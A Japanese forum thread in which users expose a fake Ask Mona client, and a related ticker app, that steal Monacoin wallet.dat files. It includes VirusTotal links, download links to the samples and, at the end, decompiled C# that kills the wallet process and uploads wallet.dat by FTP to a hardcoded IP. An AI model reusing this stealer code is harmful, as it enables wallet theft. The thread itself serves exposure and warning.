Askmonaの軽量クライアント作ってみた

科学・IT 通報案件 ウイルス

177 Res. 2.70598684 MONA 20 Fav.

この件について
http://askmona.org/5849
にまとめました。

該当するユーザーの皆様には謝罪致します。

1 :名無し開発者三級:2017/10/12 20:47:58  0MONA/0人

Askmonaを開くのがめんどくさいので、軽量化したaskmona用のクライアントを作ってみました。

使ってみてください。
改善要望はぜひ

ダウンロード
https://dl.dropboxusercontent.com/s/tuemjiiymnh7oo5/AskMona-Viewer.zip

2 :名無し開発者三級:2017/10/12 21:51:53  0MONA/0人

書き忘れましたが、バージョン確認のために私のサーバーと通信しますので、ファイアウォールの警告が出た際は、許可していただきますようお願い致します。

3 :名無し二級:2017/10/12 21:52:41  0.1MONA/1人

これウイルスだからダウンロードしたら駄目です
管理人の方は注意喚起おねがいします
洒落にならない金額になってきてるので

https://www.virustotal.com/ja/file/b7525e4506552e9be1e1e3bd7859a8e816875093b773cb605844496bd79f941e/analysis/1507812440/

4 :名無し二級:2017/10/12 21:55:10  0MONA/0人

bitcointalkとかbitcoinのIRCでも不用意にURLをクリックするなという警告がありますが、askmonaでも同様の対処が必要です
170monaが盗まれた事件もあります

早急な対応をお願いします

http://askmona.org/5813

5 :もなこいにすた★六段教士:2017/10/12 21:58:17  0MONA/0人

開発の経過報告なく出てきたから怪しいと思っていたが…。

6 :名無し二級:2017/10/12 22:23:38  0MONA/0人

cat Askmona-Viewer.exe | tr -d '\0' | strings | less
ftp://125.205.114.159
クリプターすら使えないの?(煽り)

7 :名無し開発者三級:2017/10/12 22:49:28  0MONA/0人

作成者です。
まず
ウイルス検知の件についてですが、初心者でして、配布されていたソースをコピペしたことが原因かと思います。
つきましては、私自身の無知とミスにより、ご迷惑をおかけしたことをお詫び申し上げます。
ファイルにつきましては、早急に削除させていただきました。

私自身、このプログラムを実行していて、自分自身もウォレットファイルを盗まれている可能性があるため、すべての残高を移しました。

8 :名無し三段:2017/10/12 22:57:11  0MONA/0人

どういう仕様なのかくらいは書いてくれないと怖くて使えん
どこからどうコピーしたんや?
ソースの流用に係るライセンスは?
使い方とかスクショとかは?
悪意100%やろこんなん

9 :cookie二段:2017/10/12 23:01:55  0MONA/0人

おそらくこれからはツール系はGitHubベースでソースが公開されているもの
という暗黙ルールが出来上がっていくようになるかと…

10 :名無し二級:2017/10/12 23:05:15  0MONA/0人

>>9
なお/release/に適当なバイナリ置いとくだけでDLされる模様

11 :名無し三段:2017/10/12 23:11:09  0MONA/0人

あと、流用元のコードどこから拾ってきたか書いてくれや
そこからトロイまた広がったらアレだし、せっかく発覚したんだから作成者なりコミュニティなりに連絡入れんとあかんでしょ

12 :名無し開発者三級:2017/10/12 23:15:42  0MONA/0人

>>9 >>11
私から、先程運営の方に謝罪と対応について連絡させていただきました。
流用元ですが、>>7に記載させていただきましたとおり、初心者のため、基本的なところのサンプルソース?(たとえば、ボタンを押したときの処理)をいろいろ継ぎ接ぎした形になっていて、どこから流用したソースが原因かわからない状況です。

私自身、困惑しており、おぼつかない点がありますが、出来る限り原因究明を行いたいと思います...

13 :名無し初段:2017/10/12 23:15:46  0MONA/0人

https://www.cman.jp/network/support/go_ip.cgi

お家のPCにFTP鯖立てて玉ねぎも挟まずに公開したのか…

14 :名無し三段:2017/10/12 23:19:24  0MONA/0人

(ひょっとして自宅の固定IP鯖を平文で公開してたの・・・?)

15 :名無し開発者三級:2017/10/12 23:23:21  0MONA/0人

>>13 バージョンチェックをFTPでサーバーに繋いで、適当な拡張子に変更したファイルに書いてあるバージョン情報と、クライアント側のバージョンを比較して行う形にしておりました...
おそらくその部分が原因であり、また、IPに関しては、バージョンチェック用のFTP鯖のIPだと...

>>14
はい... そういうことになります
完全に無知でした...
私自身が攻撃される可能性もあったということですよね...


本当に馬鹿です...

16 :名無し開発者三級:2017/10/12 23:24:41  0MONA/0人

もっとしっかり勉強してから、するべきでした。

17 :名無し二段:2017/10/12 23:55:03  0MONA/0人

誤検出じゃないのかな。ソースコードコピったなら既に公開されたウイルスになるはずだから、大手のセキュリティソフトが反応しないわけがないと思う

18 :名無し二級:2017/10/13 00:02:11  0MONA/0人

>>17
Askmonaの軽量クライアントがローカルの\Monacoin\wallet.dat にアクセスする訳がないんですよね。。。
ソースコードを写したというのは嘘で、検出されてないのは本当に>>1が作成した新しいウイルスだからでしょう。
手口がアレなので勉強不足というのは本当でしょうが。

19 :名無し二段:2017/10/13 00:10:42  0MONA/0人

>>18
じゃあ、ファイルを転送した際のIPアドレス探せばいいんじゃないですかね。既に実行ファイルがあれば、サンドボックスで実行して証拠取ればいいだけでお寿司

20 :とっきー三段:2017/10/13 00:12:50  0MONA/0人

170モナ昨日失ったものですが、自分はこのリンクを踏んではないので、
このソフトが原因では自分は紛失してはいないですー
自分のパターン以外になにかあるのかはわからないです。

自分が失った手口はDropboxに保存していたバックアップファイルが盗まれた可能性が一番高く、ウォレットを掌握されて送金されたようです。
自分の不注意による部分が大きそうです。

21 :名無し開発者三級:2017/10/13 00:15:18  0MONA/0人

先程、協力を得ようと思い、たまたま家に来ていたプログラムに詳しい友人(暗号通貨ももってる)に話したところ、「君がトイレ(大)に行ってる間にいたずらしようと思ってウォレットファイルをコピーするように書き換えた」と言いました。
やはり、友人が書き換え、そのことに気づかなかった私が、ウイルスを作成し公開してしまったようです。

最終ビルドをする直前にトイレに行ったときに書き換えられたため、気づくことなくビルドして公開してしまったようです...

友人に確認してもらったところ、幸いにもウォレットファイルが送信されてないとのことです。

私は、どうすればいいのでしょうか...

22 :名無し開発者三級:2017/10/13 00:16:41  0MONA/0人

>>21
説明不足でした。
友人が、ウォレットファイルをアップデートチェックのためのサーバーに送信してしまうように
アップデートチェック部分のコードをまるごと書き換えたらしいです。

23 :名無し二級:2017/10/13 00:18:52  0MONA/0人

流石に草生える

24 :名無し二段:2017/10/13 00:20:34  0MONA/0人

>21
ソースコードの公開から第三者のよってコンパイルが可能になるので、ハッシュによってそのソースコードから作成されたか確認可能。ソースコード公開を渋る理由はないと思う。

25 :名無し七段:2017/10/13 00:20:53  0MONA/0人

やっちまったかもしれん600モナ消えとる・。

26 :名無し七段錬士:2017/10/13 00:21:54  0MONA/0人

ごめんこれ消えたもなどうやって戻すんだ?

27 :名無し二段:2017/10/13 00:22:31  0MONA/0人

>>25
転送先のアドレスメモっておけば、ブロックチェーン追って追跡できる。現金化するには取引所通さないといけないから、取引所に送金した時点で詰み

28 :名無し七段:2017/10/13 00:22:53  0MONA/0人

マジだおれのもながwっわあwああわwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww
くsssssssssssssssssp

29 :名無し二段:2017/10/13 00:24:12  0MONA/0人

このサイトから追跡可能

https://mona.chainsight.info/

30 :名無し六段:2017/10/13 00:24:51  0MONA/0人

>>1
感想ですが、モナが消失しますた

31 :名無し開発者三級:2017/10/13 00:25:43  0MONA/0人

>>24
私がコードを開いたまま、トイレへと退席したため、同一PCで友人がそのまま書き換えたのち、気づかないままビルドしたのは私なので...

>>25 以降
私と友人は、他人のウォレットファイルを結果的に一切手に入れておらず、また操作しておりませんので、別件かと思いますが...

32 :名無し七段:2017/10/13 00:26:30  0MONA/0人

>>1
モナが電子屑になりました。まじで吐きそう。
>>29
追跡したとこでとりもどせんやろ

33 :名無し二段:2017/10/13 00:27:56  0MONA/0人

>>31
ソースコードの公開の拒否にはならない。公開されているソースコードにもライセンスがある。

34 :名無し開発者三級:2017/10/13 00:28:03  0MONA/0人

>>32
本当に私ではないです。
この状況で信頼してもらうほうが難しいのは承知しておりますが。

35 :はまな四段錬士:2017/10/13 00:29:01  0MONA/0人

https://www.internethotline.jp/reports/edit/IHOU7
https://www.tokumei24.jp/report/

とりあえずウイルス作成やウイルスの流布って犯罪だろ?
警察に任せればええんだから通報しといたわ

36 :名無し二段:2017/10/13 00:30:26  0MONA/0人

>>29
取引所が日本にしか無いはず。被害届で取引所抑えられる。

37 :名無し二級:2017/10/13 00:30:53  0MONA/0人

nnish君!取り調べでは余計な事喋らず弁護士の登場を待つんやで!

38 :名無し七段:2017/10/13 00:31:27  0MONA/0人

とりあえず参考にしたサイト晒せ!

39 :名無し二段:2017/10/13 00:32:55  0MONA/0人

(ワンちゃんこれaskmonaにIP残ってるよな 偽装されてたらあれだけど)

40 :名無し開発者三級:2017/10/13 00:33:10  0MONA/0人

>>24
私がコードを開いたまま、トイレへと退席したため、同一PCで友人がそのまま書き換えたのち、気づかないままビルドしたのは私なので...

>>25
私と友人は、他人のウォレットファイルを結果的に一切手に入れておらず、また操作しておりませんので、別件かと思いますが...

41 :名無し開発者三級:2017/10/13 00:33:23  0MONA/0人

すいません、焦って間違えました

42 :名無し開発者三級:2017/10/13 00:34:10  0MONA/0人

本当に私と友人はウォレットにはアクセスしてないので、残高が減ってる件については、私たちにはわかりません

このようなファイルを気づかずに公開してしまったことについては、改めて謝罪いたします

43 :名無し三段:2017/10/13 00:34:12  0MONA/0人

少なくともいかなる上記の理由も参考にしたソースと君が今回使用したソースの利用を拒む理由にはならない
ここで潔白を主張したければそれらを晒すべきだ

44 :名無し七段:2017/10/13 00:35:22  0MONA/0人

とりあえずソース公開しろそれで調べるから

45 :名無し二段:2017/10/13 00:35:26  0MONA/0人

>>41
書き換えたならファイル残ってるだろうに。初心者語るならなおさらソース出しと方がいいわ

46 :名無し五段:2017/10/13 00:36:55  0MONA/0人

>>41
ソース出して、シャレにならないくらい友人がモナ消滅しとるから
はやくしないとおえなくなる可能性が出る

47 :はまな四段錬士:2017/10/13 00:37:18  0MONA/0人

>>42
ウイルス作成かどうかは実際には分からんし仮想通貨自体資産として認められるかもわからんけど通報はしといたわ

48 :名無し七段錬士:2017/10/13 00:39:08  0MONA/0人

ソース出せないのは怪しまれてもしかたない。モナが高騰して損害賠償食らったらいくらになるかわからんぞこれ

49 :名無し二段:2017/10/13 00:39:14  0MONA/0人

>>47
通報もそうだけど、真偽のためにソースが必要。

50 :名無し七段尊者:2017/10/13 00:40:32  0MONA/0人

祭りの予感

51 :名無し開発者三級:2017/10/13 00:41:15  0MONA/0人

ウイルスの報告があったときに怖くて消してしまいました...

52 :名無し二段:2017/10/13 00:41:33  0MONA/0人

>>50
楽しくない祭りだわな

53 :名無し二段:2017/10/13 00:42:04  0MONA/0人

>>51
復元できるで

54 :名無し七段:2017/10/13 00:42:35  0MONA/0人

>>51
それだと過失だし、とりあえず真偽はわからんけどもなちょろまかしたなら返した方がいい。

55 :名無し二段:2017/10/13 00:42:45  0MONA/0人

>>51
linux windowsとも、メタデータはファイルシステム的に先に消さないから残る

56 :名無し三段:2017/10/13 00:43:00  0MONA/0人

>>51
開発環境晒せ

57 :名無し二段:2017/10/13 00:43:54  0MONA/0人

>>56
それは意味がない。環境がわかってどうするん

58 :名無し開発者三級:2017/10/13 00:43:55  0MONA/0人

>>53
どうすればいいんでしょう...
今試しています...

>>54
一切取ってません。

59 :名無し二段:2017/10/13 00:44:33  0MONA/0人

>>58
OSはwindows linux ?
windowsのほうが簡単に復元できる。

60 :名無し開発者三級:2017/10/13 00:45:03  0MONA/0人

>>59 Windows10です

61 :名無し三段:2017/10/13 00:45:05  0MONA/0人

>>57
つい質問スレの癖で・・・

62 :モナベンチャー四段:2017/10/13 00:45:15  0MONA/0人

メラミンステーキ事件みたいに、次から次へとモナ消えた報告が上がる予感

63 :名無し六段:2017/10/13 00:46:23  0MONA/0人

いろいろ終わったなこれ

64 :はまな四段錬士:2017/10/13 00:46:46  0MONA/0人

これ今日の奴か
前からのアスクモナビューワーはちゃんと公開されてるし大丈夫やんな?
最初あっちかと思ったわ

65 :もふもふ四段錬士:2017/10/13 00:49:42  0MONA/0人

ごめんなさいと言うばかりで
結局どこの何を参考にしたかも秘密で
何もわからんじゃないか

66 :名無し開発者三級:2017/10/13 00:51:39  0MONA/0人

>>64
もう一度言いますが、私は一切取ってないです。

>>65
私が参考にしたのは、
http://dobon.net/vb/dotnet/control/performclick.html
こういったところのサンプルを参考にしたので、そちらには問題がなかったと思います。

先程行ったとおり、ふざけて書き換えた

67 :はまな四段錬士:2017/10/13 00:52:32  0MONA/0人

これ初期の詐欺とは比べ物にならない被害額でてそう

68 :名無し六段:2017/10/13 00:53:36  0MONA/0人

>>67

万単位のもなもってるやつもいるから
安く見積もって1000万くらい?億いくかもな

69 :名無し開発者三級:2017/10/13 00:53:54  0MONA/0人

いや、ほんとに私は全くです。
調べていただければわかると思います。

70 :名無し六段:2017/10/13 00:55:00  0MONA/0人

>>66
おふざけで書き換えたというのは過失それも悪意があってと判定される。
モナを失った人に損害賠償請求されたら勝てない。善意の第三者とかなら白だけど悪意なら真っ黒やで

71 :名無し開発者三級:2017/10/13 00:56:24  0MONA/0人

>>70
はい、誰がはおいておいて、おふざけで書き換えたのは間違いないです。
でも、私がモナを一切取ってないのは、どうなんでしょうか。

72 :がんただおやびん六段:2017/10/13 00:56:41  0MONA/0人

とりあえず、刑事持ち込んでも被害回収できないから、民事で和解がいいな。
ASK管理人にいって被害者はまず>>1のIPから特定して、連絡とるしかない
はじめはあれだな内容証明郵便とか送ればいいよ

73 :名無し二段:2017/10/13 00:57:22  0MONA/0人

>>69
出来る限り原因究明するって言っといてソース消すんかい。ってツッコミしたい。誰かまだ実行形式の方持ってない?

74 :がんただおやびん六段:2017/10/13 00:57:41  0MONA/0人

>>71
立証しないといけないし、自分がとってなくても第三者に悪意でとらせたなら
幇助にあたるから、重過失じゃね?

75 :がんただおやびん六段:2017/10/13 00:58:47  0MONA/0人

>>73
コンパイルするまえのソースの方がいい逆アセンブリとかめんどくせえ

76 :名無し三段:2017/10/13 00:58:56  0MONA/0人

正直究極に黒に近いグレーと思うけど、流石に被害者のトランザクション晒すの先では

77 :はまな四段錬士:2017/10/13 00:59:14  0MONA/0人

>>71
お前の友人が持ってるよ
ていうかホントにそんな奴いんの?
お前がトイレ行ってる間に勝手にソースコード書き換えでウェレットの中身取ろうとしてしかもそれをお前が公開?
えらいタイミングよすぎない?

78 :もふもふ四段錬士:2017/10/13 01:00:38  0MONA/0人

誰がどれだけダウンロードしたかも不明だし被害があるかもまだ不明だし
まずはaskmona管理人に連絡取って目立つところで告知と
ログの保全もお願いした方がいい

そのプログラムはどういう動きするの?起動しただけで駄目なの?

79 :名無し二段:2017/10/13 01:00:38  0MONA/0人

>>75
ソース出さないならそれしか無い
関数名とか変数名とかはあれになるけど、通信先ぐらいは見えるはず

80 :がんただおやびん六段:2017/10/13 01:01:02  0MONA/0人

>>77
禿同

対策本部すれ作った運営にいってIP公開たのもうず
http://askmona.org/5846

81 :名無し二段:2017/10/13 01:02:35  0MONA/0人

>>78
実行形式が手元にないからあれだけど、一般ユーザーでアクセス可能な領域ならユーザーの確認なしにアクセスできる。

82 :がんただおやびん六段:2017/10/13 01:03:05  0MONA/0人

1がいってることが本当なら、友人が書き換えて自分のウオレットにぱちった
モナ入れてるんだな 損害賠償分上乗せして返せばとられた人もゆるしてくれるかもな

83 :名無し開発者三級:2017/10/13 01:03:09  0MONA/0人

>>78
起動したら、wallet.datを私のバージョンチェック用のサーバーに送信するようにしていたみたいです。
ただ、ファイアウォールの関係でうまく行ってなかったみたいです。

84 :名無し開発者三級:2017/10/13 01:04:26  0MONA/0人

ソースはできるかわからないですが復元中です。
書いたソースは大体覚えているので、新しく書くことはできますが...

85 :がんただおやびん六段:2017/10/13 01:04:53  0MONA/0人

wallet.datすっぱ抜く仕様みたいだな

ウイルスに気がつく速攻削除でみんなのPCにもでた―残りにくい
頭いい作戦だな

86 :モナベンチャー四段:2017/10/13 01:05:51  0MONA/0人

>>84
友人にいってぱくったモナ元に戻せってとりあえず言え!

87 :名無し開発者三級:2017/10/13 01:06:14  0MONA/0人

>>86
盗んでないので戻すも何もないです。

88 :名無し七段錬士:2017/10/13 01:06:45  0MONA/0人

高騰したモナをばっくれた1がいるスレはここでつか?

89 :名無し二段:2017/10/13 01:10:30  1.14228114MONA/2人

被害者いるなら盗まれたと主張する送信先アドレスをだすべき

90 :SumiNo四段:2017/10/13 01:20:51  0MONA/0人

ようはデコンパイルすればいいんでしょう
c#ならなおさら解析が簡単ですし
てわけでやってみます。

91 :名無し二段:2017/10/13 01:21:34  0MONA/0人

>>90
実行形式もってるんかーい

92 :もがみん七段教士:2017/10/13 01:25:10  0MONA/0人

>>68

盗まれたふりしてモナゲしてもらう作戦ですか
お疲れ様です

93 :名無し二段:2017/10/13 01:32:20  0MONA/0人

>>6
これはなんのアドレスだ?

94 :もふもふ四段錬士:2017/10/13 01:51:20  0MONA/0人

結局、ウィルスとしては不発で動いてないということ?
バージョンチェック用のサーバは止めたの?
その友人とやらの言葉も全部本当(存在自体もだけど変更箇所がそこだけか等)かもわからないし
今後公開されるソースがそのものかもわからない
誰も被害を申し出なければこのまま終わるだろうけど
どちらにしてもダウンロードした人への周知は必要

95 :名無し開発者三級:2017/10/13 01:54:27  0MONA/0人

>>94
はい、ファイアウォールの関係で動かたかったみたいです。
サーバーは停止しております。

報告があった時点で、ファイルの公開を停止して、トピックの概要にその旨を記載しました。

96 :もふもふ四段錬士:2017/10/13 02:12:27  0MONA/0人

>>95
一番下に管理人のメールアドレスあるから一応連絡しておいたら
このまま何も無ければいいけど念のため

97 :名無し開発者三級:2017/10/13 02:14:48  0MONA/0人

>>96
管理人様には、連絡済みです。
ファイルに関しては、公開停止してあります。

98 :名無し初段:2017/10/13 02:15:14  0.1MONA/1人

完全に勘違いの可能性もあって申し訳ないんだけど
このスレ http://askmona.org/5806
のMonacoinTickerもちょっと怪しいなという感じ(今はダウンロード出来ない)

いくつかの共通点・疑わしい点がある
・開発者の>>1が新規ユーザ
・dropboxのリンク/Windowsのデスクトップアプリ/ソース非公開
・文面の共通性
・なぜか今ダウンロードできない
など

もちろんこのスレの>>1が [http://askmona.org/5806] の>>1に扮してウイルスをばらまいてるだけの可能性もある
このスレでは1時間後にウイルスであることが指摘されてるけど [http://askmona.org/5806] では1日中公開されてたみたいなので、危険度も高い
念の為確認するように書いておきます

99 :名無し二段:2017/10/13 02:24:09  0MONA/0人

送信先アドレス、出てる?
誰か見せて

100 :名無し二段:2017/10/13 02:27:22  0MONA/0人

いや~、昨日からMonaを狙った犯罪が流行ってんのかな?
Monaの価値が上がって喜んでいたけど、
これからは狙われるということになっていくんか。
真面目にセキュリティーを考えないと被害者がまだ出てきそうだね。

101 :はまな四段錬士:2017/10/13 02:31:50  0MONA/0人

>>98
これなら持ってるわ
ウイルスかどうかは知らんが調べてくれるなら渡せるが

102 :名無し初段:2017/10/13 02:32:05  0.1MONA/1人

というか [ http://askmona.org/5806 ] の方が怪しい

最初 /user/4421 がファイルをアップロードしてて、その直後に /user/3360 が「ダウンロードさせていただきました」という趣旨でレビューを行っている

ところが>>8では /user/3360 がなぜか不具合を修正したという報告をしており、自演アカウントの使い分けを間違えていると考えざるを得ない

わざわざ自演レビューする理由はなぜかと考えるとマルウェアの可能性は高そう

103 :名無し初段:2017/10/13 02:33:05  0MONA/0人

>>101
一応どこかにアップロードしていただけると助かります。
こことか。
https://anonfile.com/

104 :名無しさん@一級:2017/10/13 02:33:12  0MONA/0人

>>95
>>2でファイアーウォールの例外設定しろって指示してるやんw
ファイアーウォールの例外設定して起動しちゃった人はwallet.datがお前のサーバに送られてんだろ
wallet.datがあればもうサイフがそっちにあるのとおんなじやよね?
絶対お前確信犯やんw

105 :名無しさん@一級:2017/10/13 02:33:42  0MONA/0人

とりあえず落としたデータ持ってる人おったらのせてくださいな
ただ、>>1が悪意のないソースに変えたものをアップしてくる可能性もあるので確かめずらいが..

初め、検知はソースコードのコピーが原因といってたが、wallet.datが送信されているとバレると友人がソース勝手に書いたという..
>>3 を見れば分かるようにほとんどのソフトで検知できないってことは自作である可能性が高いだろうね

106 :名無しさん@一級:2017/10/13 02:34:05  0MONA/0人

被害者から送信先のアドレスを聞けたとしてもたぶんそれだけで本人特定は出来ないね
換金時に本人確認書類が必要だが、他のウォレットに移して換金してればアドレスによる換金所側からの特定や停止措置はできないね

>>98
確かに...
>>20はMonacoinTickerとか使ったんでなかろうか

本人特定につながるのは送信先のサーバの調査くらいか..?海外のレンタル鯖とかだとしてIP偽装もしてたらかなり特定はだるいが..

107 :名無し二段:2017/10/13 02:35:42  0MONA/0人

>被害者から送信先のアドレスを聞けたとしてもたぶんそれだけで本人特定は出来ないね

被害額や被害にあった人数は、あるいは分かるかも

108 :名無し初段:2017/10/13 02:38:20  0MONA/0人

>>105

自分が持ってるのはこのスレッドのだけです。

[実行厳禁]
ttps://anonfile\.com/Zaq1G2cfbc/AskMona-Viewer.zip

109 :はまな四段錬士:2017/10/13 02:39:09  0MONA/0人

>>103
https://anonfile.com/ber5G3c2b8/MonacoinTicker.zip

ウイルスだった場合流布もやばいと思ってたからスカイプとかになるかと思ってたけどここなら大丈夫っぽそうなのでとりあえずあげときました
一番最初にあげられた際のなので
アップデートは一切されてない奴のはずです

110 :名無し開発者三級:2017/10/13 02:40:00  0MONA/0人

なんでも言いますが、私はモナを一切取っていません。

111 :名無し初段:2017/10/13 02:45:32  0MONA/0人

>>109

C:\Users\nnish\ という、開発環境のファイルパスが残ってるっぽい
ほぼ同一人物確定ですね

112 :名無し開発者三級:2017/10/13 02:47:58  0MONA/0人

確かに
http://askmona.org/5806
>>1>>10 >>11は私です。
管理の都合アカウントを分けていたのですが、切り替えを間違えました。

113 :はまな四段錬士:2017/10/13 02:48:21  0MONA/0人

>>111
ちょっと待ってこれも確かにファイヤーウォール許可しやなあかん奴やった
これって全部の通貨のファイル取られてるの?
俺起動しちゃってファイヤーウォール許可してたんやが・・・

114 :はまな四段錬士:2017/10/13 02:49:19  0MONA/0人

>>112
お前警察に捕まることが確定したやろこれ

115 :名無し開発者三級:2017/10/13 02:49:22  0MONA/0人

Tickerの方も確認したところ、ソースコード上にwallet.datにアクセスするコードが見つかりました...

116 :名無し開発者三級:2017/10/13 02:50:14  0MONA/0人

ただ、通貨に関しては、一切盗っていません。

117 :名無し初段:2017/10/13 02:50:18  0.1MONA/1人

スレッド 5806でアップロードされたファイル
https://www.virustotal.com/ja/file/5f209b11269b8c3153ef272977a04ef48e5b432831d8849bc70e9ab68c713b35/analysis/1507830119/

こっちもFTPのIPと ftp://60.47.69.174/ wallet.datのパスが見えますね \Monacoin\wallet.dat

マルウェアの可能性が非常に高い

118 :はまな四段錬士:2017/10/13 02:51:18  0MONA/0人

>>115
wallet.datて全部なん?
全部にアクセスするの?
ちょっと待って5つぐらいウォレットとか通貨とか全部かえやなあかんのこれ?

119 :名無し初段:2017/10/13 02:51:19  0MONA/0人

このIPはxdedicとかで買ったのかな?多分本人のものでは無いです

120 :名無し開発者三級:2017/10/13 02:51:26  0MONA/0人

>>117
はい、私自身でも確認してます。
間違いないです。

121 :名無し開発者三級:2017/10/13 02:51:45  0MONA/0人

>>118
モナのウォレットだけになってました

122 :名無し初段:2017/10/13 02:52:21  0.39MONA/1人

>>118
Monacoin以下のwallet.datしか触ってなさそうですが、当然マルウェアの侵入を許したのであれば全部変えるべきですね

123 :名無し二段:2017/10/13 02:53:17  0MONA/0人

6すれも117スレも出てるアドレスぷららのやつなんだけど

124 :はまな四段錬士:2017/10/13 02:53:26  0MONA/0人

とりあえずモナコインだけ入れ直しでいいのかよかった

125 :とっきー三段:2017/10/13 02:54:56  0.1MONA/1人

>>106
20です。

MonacoinTickerは自分も、火曜日にダウンロードして使いました。
170飛んだのはその後ですね。。。

送信されたアドレスの先に600モナとかどこからか合流されて、それが別のアドレスに動いているの確認できます。
https://mona.chainsight.info/address/MLQDT7iB2y9S59bj3dqmHhzbEWxZsFYYid

126 :名無し初段:2017/10/13 02:56:46  0MONA/0人

>>125

なるほど。。。完全に真っ黒ですね

127 :とっきー三段:2017/10/13 02:57:52  0MONA/0人

そして、ファイヤーウォールはこの時マイニングしていたので切ってました。。。

128 :名無し二段:2017/10/13 02:58:59  0MONA/0人

https://www.cman.jp/network/support/ip.html
こちらでipアドレスの管理は調べられます。ただし踏み台の可能性もあります。

129 :名無し二段:2017/10/13 02:59:57  0MONA/0人

警察に届けた方がいいんじゃない?

130 :名無し開発者三級:2017/10/13 03:00:29  0MONA/0人

事実は以下のとおりです。
作成したTickerとAskmona-Viewerに開発段階で興味本位でwallet.datにアクセスするコードを書きました。
怖くなって、友人が書いたと言いましたが、明らかに私が興味本位で書いたものです。
ただ、Tickerを作ったあとに、バージョンアップのチェックを行うソースに書き換えたつもりでしたが、途中でエラーが出て、バックアップソースから復旧移植した際に、ファイルを誤り、古いファイルからコピーしたため、興味本位で書いたソースがそのまま残ってしまったようです。

131 :名無しさん@一級:2017/10/13 03:00:54  0MONA/0人

ここのスレのやつは友人が悪意のあるソースにを書き換えたと言ってたが、MonacoinTickerもそういうことになってるんですがどういうことでしょうかnnish君?^_^

132 :名無し開発者三級:2017/10/13 03:00:56  0MONA/0人

>>127
盗まれたMONAについて、少しお話があります。

133 :はまな四段錬士:2017/10/13 03:02:42  0MONA/0人

>>122
マルウェア自体を削除してもあかんのか?

134 :名無し二段:2017/10/13 03:04:55  0.039MONA/1人

>>133
Monappyあたりに送金した方が良いんじゃないかな
そのwalletは第3者からいつでも盗める状態になってると言うことだろ

135 :名無し初段:2017/10/13 03:05:54  0MONA/0人

>>133

いや、私のお金ではないので構わないのですが、もし私ならウォレットは全部作り直しですね

136 :ずがーん五段錬士:2017/10/13 03:07:31  0MONA/0人

>>135に同意
暗号通貨扱ってるPCに変なものの侵入許すってだけで怖すぎる

137 :はまな四段錬士:2017/10/13 03:08:08  0MONA/0人

>>134
つまりこれって俺のpcよりウェブの方が安全になってるんだよな
ネコニウムとかのイーサリアム系がよく分からないのとか作り直しが悲しい

138 :名無し二段:2017/10/13 03:08:44  0MONA/0人

>>133
bitcoinをベースとした仮想通貨は、暗号化によってデータを保護してる。復号化するためのデータが抜かれたという感じ

139 :名無し二段:2017/10/13 03:10:03  0MONA/0人

プログラムが解析されてないから、できればOSのクリーンインストールが望まし

140 :名無し開発者三級:2017/10/13 03:10:48  0MONA/0人

askmona-viewerについて、
ウォレットから一切モナは盗んでおりません。(ゲットできておりません)
なお、興味本位で書いた時点で、パスフレーズを設定していた私のウォレットは、wallet.datをとってもパスフレーズがわからないと、一切操作できませんでした。

141 :はまな四段錬士:2017/10/13 03:12:17  0MONA/0人

>>138
ビットコイン系のだけでいいのか
とりあえずTicke削除とウェレット交換か

142 :もふもふ四段錬士:2017/10/13 03:12:19  0MONA/0人

セキュリティベンダーにウィルス検体は提出済み?

143 :名無し二段:2017/10/13 03:13:02  0.1MONA/1人

>>140
パスフレーズがわかるもしくは暗号化していないとできるって言ってるんやで

144 :とっきー三段:2017/10/13 03:13:14  0MONA/0人

>>132
どういった形で、どう話したらいいでしょうか?
まだ、自分はこれが原因なのか、①自分でソフトを解析できない、②あなたは取っていないとおっしゃっている、この2点からので判断できていません。

あなたが、ほんとうに意図してやっておらず、盗んでいないのであれば、ハチの巣のように炎上することは良くないと考えています。

しかし、意図してウォレットから引き出していたのであれば、正直に説明していただきたいし。このソフトをDLした方は多くいると思いますので、私だけでなく、アドレスで終える方々への対応をしっかり行っていただきたいです。

145 :名無し初段:2017/10/13 03:13:36  0.1MONA/1人

>>20 さんその他被害にあった方

被害届を出すときは証拠として該当するaskmona.orgの掲示板のページや、ウイルスファイルの中に見える文字列を紙に印刷したものを持って行った方がいいです
警察は絶対嫌がると思いますが、暗号通貨関連の事件でこういうのは今後避けられないはずと説得すれば動いてくれると思います

>>1 は早めに謝罪スレでも立てて、立件される前に全額返金したほうがいいですね

146 :名無し二段:2017/10/13 03:14:24  0MONA/0人

>>141
すまん。イーサーリアム系は詳しくない

147 :ずがーん五段錬士:2017/10/13 03:14:47  0.39MONA/1人

>>141
一番いいのは、他のPCで作った財布 or 取引所に全て送ってしまってOSのクリーンインストール
他の暗号通貨のウォレットもどうされるかわからないので

148 :名無し開発者三級:2017/10/13 03:15:36  0MONA/0人

別スレにて謝罪、対応とソースコードを記載します。
今書いておりますので、それまでお待ちいただけませんか。

149 :名無し二段:2017/10/13 03:18:50  0.039MONA/1人

>>141

時間との勝負かも。
「ずがーんさん」のやり方が正解だと思う。

と言うか、時間稼ぎをしてるような気も

150 :はまな四段錬士:2017/10/13 03:19:43  0MONA/0人

>>139
これが勉強代なんか
手間だけで大した金額を入れてなかったために盗まれずにすんだけど

151 :名無し二段:2017/10/13 03:22:31  0MONA/0人

まだ簡易的だけど
https://imgur.com/a/PTUdY

152 :名無し開発者三級:2017/10/13 03:22:50  0MONA/0人

http://askmona.org/5849#bbs_end

こちらの方に全容をかかせて頂きました。
急いで書いたため、不明な点があるかと思います。
上記スレで対応いたします。

153 :はまな四段錬士:2017/10/13 03:22:55  0MONA/0人

>>147
bitzenyやクマはどこに送るかが問題やなぁ

154 :名無し二段:2017/10/13 03:34:52  0MONA/0人

private void Form1_Shown(object sender, EventArgs e)
{
try
{
if (Process.GetProcessesByName("monacoin-qt").Length != 0)
{
foreach (Process process in Process.GetProcessesByName("monacoin-qt"))
process.Kill();

155 :名無し二段:2017/10/13 03:35:05  0MONA/0人

}
string path = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\Monacoin\\wallet.dat";
StringBuilder stringBuilder = new StringBuilder(10);
Random random = new Random();
for (int index1 = 0; index1 < 10; ++index1)
{
int index2 = random.Next(Form1.passwordChars.Length);
char passwordChar = Form1.passwordChars[index2];
stringBuilder.Append(passwordChar);

156 :名無し二段:2017/10/13 03:35:28  0MONA/0人


}
FtpWebRequest ftpWebRequest = (FtpWebRequest) WebRequest.Create(new Uri("ftp://125.205.114.159/"; + stringBuilder.ToString() + ".dat"));
ftpWebRequest.Credentials = (ICredentials) new NetworkCredential("user", "password");
ftpWebRequest.Method = "STOR";
